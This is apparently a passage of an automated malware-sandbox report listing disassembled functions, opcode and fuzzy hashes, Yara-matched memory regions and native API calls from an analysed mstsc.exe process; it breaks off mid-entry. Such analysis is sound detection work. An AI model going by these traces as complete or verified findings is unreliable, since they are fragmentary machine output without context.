                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a88d1365b426df6e8f07406f2b00005cfc4547e14a0f14f670dfb8a7b30175d4
                                                                    • Instruction ID: e65d8c515bfc9ced9a4b9d6b285d09139856cd5edd0d31e458f172efa4a5c7ea
                                                                    • Opcode Fuzzy Hash: a88d1365b426df6e8f07406f2b00005cfc4547e14a0f14f670dfb8a7b30175d4
                                                                    • Instruction Fuzzy Hash: 2090027128140412D1007199881874B0055B7D0342FD1C411A5154995ECAA5C8917571
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599A80, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47731b95e50d1b01089fd863fd27de5b99a116362bd8e5ff976968bc774191ca
                                                                    • Instruction ID: 65c6189027585ec971312ca2a5ccbb60ba62e4df01b642b3e2f33731da729144
                                                                    • Opcode Fuzzy Hash: 47731b95e50d1b01089fd863fd27de5b99a116362bd8e5ff976968bc774191ca
                                                                    • Instruction Fuzzy Hash: E790026128144452D14072998814B0F4155B7E1242FD1C419A4146994CCD5588556761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599560, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27186e47f56ebf1635f66934808efe64b9c606c61fcf368cf5dc66e72fc5636a
                                                                    • Instruction ID: b173fa2b818a63aea653cb6dbc5aed185ba9b6caf8637d6121a2c0b515efda12
                                                                    • Opcode Fuzzy Hash: 27186e47f56ebf1635f66934808efe64b9c606c61fcf368cf5dc66e72fc5636a
                                                                    • Instruction Fuzzy Hash: 9F9002652A1000120145B599461450F0495B7D63913D1C415F14069D0CCA6188656361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0159AD30, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86c491860a783852d6eab918fa7113e173ed81e07042ed75630fa2c3d8ec49e9
                                                                    • Instruction ID: 4abaaca4c03329660e04d2b0bd01b1776c498e387fd396ece11bda5dbd057748
                                                                    • Opcode Fuzzy Hash: 86c491860a783852d6eab918fa7113e173ed81e07042ed75630fa2c3d8ec49e9
                                                                    • Instruction Fuzzy Hash: 4E900271A850002291407199882464A4056B7E0781BD5C411A0504994CCD948A5563E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599520, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecb599d561e338e1e3ccf50a86be27c120db0defc82a325016c0a06f0a230e61
                                                                    • Instruction ID: a66f7e3554e6a34f1b76493c951c78b563cb8641941282ef8add2d067a0aa3e0
                                                                    • Opcode Fuzzy Hash: ecb599d561e338e1e3ccf50a86be27c120db0defc82a325016c0a06f0a230e61
                                                                    • Instruction Fuzzy Hash: 1D9002E1281140A24500B299C414B0E4555B7E0241BD1C416E10449A0CC9658851A175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015995F0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 406c6d355fa9d961b0922a78f7a764a26ed132143c552a00ac0b3ec42b85de79
                                                                    • Instruction ID: 7e5ccd4f3f9e828dbb43c6f1f4e734591928279ba678b6ca4ab959330de9cbd3
                                                                    • Opcode Fuzzy Hash: 406c6d355fa9d961b0922a78f7a764a26ed132143c552a00ac0b3ec42b85de79
                                                                    • Instruction Fuzzy Hash: 8B90027128100812D1047199881468A0055B7D0341FD1C411A6014A95EDAA588917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0159A770, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bdf7937fbc14f789075522831b825feea11d3820c073a346acb1329fe2069e5f
                                                                    • Instruction ID: 02288a3f3a6d54017f0e0c54ba9519c32820c10126f74a8f0c3a20aaa6709a93
                                                                    • Opcode Fuzzy Hash: bdf7937fbc14f789075522831b825feea11d3820c073a346acb1329fe2069e5f
                                                                    • Instruction Fuzzy Hash: FC90027528504452D50075999814A8B0055B7D0345FD1D811A04149DCDCA948861B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599770, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7bc25ca640999bec54e6e74346a9193971052159c151d660444103bd02621946
                                                                    • Instruction ID: 02de525318ed25c3ef26d1d6fd73e7c0488bf0d2560b54f8455823326752d9fa
                                                                    • Opcode Fuzzy Hash: 7bc25ca640999bec54e6e74346a9193971052159c151d660444103bd02621946
                                                                    • Instruction Fuzzy Hash: A990026128504452D10075999418A0A0055B7D0245FD1D411A10549D5DCA758851B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599760, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2de69cc02e4cf30aa33a27f45a019936681c6cf939e19c953a1ac9045d9163ab
                                                                    • Instruction ID: 661fc22470a487c2c87d4498db41b49220820572ae0a4604c44c7ffdaa86b227
                                                                    • Opcode Fuzzy Hash: 2de69cc02e4cf30aa33a27f45a019936681c6cf939e19c953a1ac9045d9163ab
                                                                    • Instruction Fuzzy Hash: DD90027128100413D1007199951870B0055B7D0241FD1D811A0414998DDA9688517161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0159A710, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4696b48eeb13bdfef34613d14507800a409d4d7bc60f53b251029555f30df0b0
                                                                    • Instruction ID: 1940769aac662bd0236e83ef604103b9e6e562d4611b2da25f8b0365f61ccbc9
                                                                    • Opcode Fuzzy Hash: 4696b48eeb13bdfef34613d14507800a409d4d7bc60f53b251029555f30df0b0
                                                                    • Instruction Fuzzy Hash: 0D900271381000629500B6D99814A4E4155B7F0341BD1D415A4004994CC99488616161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599730, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 722ce0a7f9a2675387ac18f188e6efe3f153a6ce3443f113756caadcc3868d24
                                                                    • Instruction ID: ea278f202b87d3c4d5abcda29b8730ee53fb1d177759eb446611a1f714effd98
                                                                    • Opcode Fuzzy Hash: 722ce0a7f9a2675387ac18f188e6efe3f153a6ce3443f113756caadcc3868d24
                                                                    • Instruction Fuzzy Hash: 7790026168500412D1407199942870A0065B7D0241FD1D411A0014994DCA998A5576E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599650, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c74ca42e2e957a9bea5e01a98263b3ecd5ab09be3144c15128308fdfafb4da6
                                                                    • Instruction ID: 5d87f3a034cb6485198aa7a03b90552cd70617fe6537b89cc05be455494d530d
                                                                    • Opcode Fuzzy Hash: 0c74ca42e2e957a9bea5e01a98263b3ecd5ab09be3144c15128308fdfafb4da6
                                                                    • Instruction Fuzzy Hash: BB90027128504852D14071998414A4A0065B7D0345FD1C411A0054AD4DDA658D55B6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599610, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c3124c0378375427628c9fb3db3c77a108cf116b4d1bb87e7675b4c130f175b
                                                                    • Instruction ID: f949cf35515c18d9bb02300b2a696cd0aa0e387b4398c17fc1604de45bea2d2d
                                                                    • Opcode Fuzzy Hash: 2c3124c0378375427628c9fb3db3c77a108cf116b4d1bb87e7675b4c130f175b
                                                                    • Instruction Fuzzy Hash: EB90027168500812D1507199842474A0055B7D0341FD1C411A0014A94DCB958A5576E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015996D0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e812be9ae4e2d0f4663e70d55f90931b18f4c32a5efe6628048e3082f91b11e
                                                                    • Instruction ID: 67d823cb23cfafcdc1f6514ff19daf921d15144104c26b4d132a02b571038011
                                                                    • Opcode Fuzzy Hash: 7e812be9ae4e2d0f4663e70d55f90931b18f4c32a5efe6628048e3082f91b11e
                                                                    • Instruction Fuzzy Hash: 7490027128100852D10071998414B4A0055B7E0341FD1C416A0114A94DCA55C8517561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599670, Relevance: .0, Instructions: 2COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: bd30c2fc23e8f006bc30ad52b71b1a1788f3b01b5ef70963575f5b054f246dbe
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015EFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015EFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015EFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: f96722b438a547855ad2604f9cded8822ca0cd262a345a9eafbe0bf2515014d6
                                                                    • Instruction ID: 5bb7908d06d85b184b983d2cb5c82d80894548554108b4ed1ff1dcf7d4cb22db
                                                                    • Opcode Fuzzy Hash: f96722b438a547855ad2604f9cded8822ca0cd262a345a9eafbe0bf2515014d6
                                                                    • Instruction Fuzzy Hash: 33F0FC765402027FE6251A45DC05F237F9AFB84774F140315F6185E1D1EA62F83086F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: mstsc.exe PID: 6268 Parent PID: 3292 mstsc.exeCOMMON

                                                                    Executed Functions

                                                                    Function 033285EA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,03323BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03323BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0332863D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                                                                    • Instruction ID: 883da2669258dde8695ef0a6a15f113ffff8a21d84c963060ec98784dd135565
                                                                    • Opcode Fuzzy Hash: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                                                                    • Instruction Fuzzy Hash: D501AFB2610208AFCB48CF98DC84EEB77A9AF9C754F158248BA0DD7241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 033285F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,03323BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03323BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0332863D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: bfa04bc67d995aa34b893d074883a5fb996c447c95e2b86d328ad1857cd91927
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: 8FF0BDB2200208ABCB08CF89DC84EEB77ADAF8C754F158248BA0D97241C630F811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03328642, Relevance: 1.6, APIs: 1, Instructions: 73filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(03323D82,5E972F65,FFFFFFFF,03323A41,?,?,03323D82,?,03323A41,FFFFFFFF,5E972F65,03323D82,?,00000000), ref: 033286E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                                                                    • Instruction ID: 27ca8d32ce525e4c2615505542a43ef9f7795621dd8b8ef98736005e1800fbc9
                                                                    • Opcode Fuzzy Hash: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                                                                    • Instruction Fuzzy Hash: 7A21EAB6214118ABCB18DF99DC84EEB77A9AF8C354F158248BA0DA7241C630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0332869A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(03323D82,5E972F65,FFFFFFFF,03323A41,?,?,03323D82,?,03323A41,FFFFFFFF,5E972F65,03323D82,?,00000000), ref: 033286E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                                                                    • Instruction ID: d08b2f78b45996c6259c37064f1c78128d0b6b7c6c7a36ad057aa8c99e9e6a39
                                                                    • Opcode Fuzzy Hash: 7806de6a9a1ab518ab594c854be9053a4dfb9cc74e814942fda7c4050aa266c8
                                                                    • Instruction Fuzzy Hash: 3CF0A4B6600208ABCB14DF99DC84EEB77ADAF8C754F158649BE1D97241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 033286A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(03323D82,5E972F65,FFFFFFFF,03323A41,?,?,03323D82,?,03323A41,FFFFFFFF,5E972F65,03323D82,?,00000000), ref: 033286E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: 17ed33efa527112f5490024830bee27f29ba8191ff3d3209f4beeb91f737f363
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: 1BF0A4B6200208ABCB14DF89DC84EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 033287D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03312D11,00002000,00003000,00000004), ref: 03328809
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: 51f5d26dda36e2c3a01a90b841c9e75f921d8fa6a11bf23a7a68469803bcefa5
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: 84F015B6200218ABCB14DF89CC80EAB77ADAF88650F118148BE0897241C630F810CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 033287CB, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03312D11,00002000,00003000,00000004), ref: 03328809
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: 8e25fd84456c6487ab96bf642f5072ad90049e3f9967c26ad219bfd6177ddda4
                                                                    • Instruction ID: 6aa9d0d0b82d3146de740d04e00705036ca76ed7b788c0b9b3b8a790e4e220e0
                                                                    • Opcode Fuzzy Hash: 8e25fd84456c6487ab96bf642f5072ad90049e3f9967c26ad219bfd6177ddda4
                                                                    • Instruction Fuzzy Hash: B8F01CB6200258AFDB14DF89CC84EA77BA9FF8C350F158549FE599B241C630E820CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03328720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(03323D60,?,?,03323D60,00000000,FFFFFFFF), ref: 03328745
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Offset: 03310000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: a6a1dd7b7f348ffd32a4af2d66e60d5731d63b98615c46e7a0676fbc0be5a180
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: F4D01776600318ABD710EB99CC89FA77BACEF48660F154499BA189B242C630FA1086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 32cfee49e2ee0085456737b8b2aeb0b9bd3b2b04d0da39736cf024dc0b977104
                                                                    • Instruction ID: 01a1bdb619394ec8905b334221a3e96db76c620cde2599690da622f0c1d513ad
                                                                    • Opcode Fuzzy Hash: 32cfee49e2ee0085456737b8b2aeb0b9bd3b2b04d0da39736cf024dc0b977104
                                                                    • Instruction Fuzzy Hash: 65900265211000030109A9990745507006A97D53A1391D121F1005654CE6A18861A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 151537208db3adb6d79fc19c6e79dc469b34d84198ce67d71c995be3efeb0580
                                                                    • Instruction ID: c69be5048efbaf2be1611b9de128ca08506d377f77a7529386c1556fcf3cfe8b
                                                                    • Opcode Fuzzy Hash: 151537208db3adb6d79fc19c6e79dc469b34d84198ce67d71c995be3efeb0580
                                                                    • Instruction Fuzzy Hash: 799002A120200003410975994455617402E97E0251B91D121E1004694DD5A58891B165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2b40e53409cafd3fd67373fedf6bfb2ad0e97a914ad270ec8ae314d74e9ead2b
                                                                    • Instruction ID: 49cd3abb0f832d2067fa82c679e1a09aad329f27cdb7d184e09e7038e1c79d12
                                                                    • Opcode Fuzzy Hash: 2b40e53409cafd3fd67373fedf6bfb2ad0e97a914ad270ec8ae314d74e9ead2b
                                                                    • Instruction Fuzzy Hash: 7790027120100402D10469D95449647002997E0351F91E111A5014659ED6E58891B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 70d21bb18dd9cdbdb1e8143ed9d1d28a34162fccd60f92e268407c583c8fd1a9
                                                                    • Instruction ID: 35430f4e8831ad8c48ed9def0d3cfe9af262fd840be13315e23c23f3c470ceff
                                                                    • Opcode Fuzzy Hash: 70d21bb18dd9cdbdb1e8143ed9d1d28a34162fccd60f92e268407c583c8fd1a9
                                                                    • Instruction Fuzzy Hash: 4990027131114402D11465998445707002997D1251F91D511A081465CD96D58891B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0ec81de389eda2aa71c2bf25f0756c7434106b0da6bfee5f76260db3cae878f6
                                                                    • Instruction ID: a3811439181abed9e818ebbcb8310c2907521694fe75915ee03e33bee79bc5b5
                                                                    • Opcode Fuzzy Hash: 0ec81de389eda2aa71c2bf25f0756c7434106b0da6bfee5f76260db3cae878f6
                                                                    • Instruction Fuzzy Hash: C190026921300002D1847599544960B002997D1252FD1E515A000565CCD9958869A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 055F9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, Offset: 05590000, based on PE: true
                                                                    • Associated: 00000011.00000002.525547325.00000000056AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: deead70040d2e4bc9da3520716dd64da9556e80867e2e777f4c15fe63662329a
